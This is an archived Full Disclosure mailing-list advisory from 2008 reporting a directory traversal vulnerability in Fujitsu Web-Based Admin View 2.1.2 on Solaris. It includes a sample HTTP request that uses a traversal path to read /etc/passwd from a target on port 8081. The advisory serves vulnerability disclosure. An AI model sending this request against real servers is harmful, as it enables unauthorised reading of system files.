Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Full Disclosure: Fujitsu Web-Based Admin View Directory Traversal Vulnerability

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

From: Deniz Cevik <Deniz.Cevik_at_intellect.com.tr>
Date: Thu, 21 Aug 2008 16:34:00 +0300

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

 

Version: 2.1.2 on Solaris, Other versions may vulnerable

 

Vulnerability: Directory Traversal

 

Risk: Critical

 

Description: Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server.

 

Sample Request:

 

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0

Host: target:8081

 

Deniz CEVIK

www.intellectpro.com.tr

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Aug 21 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]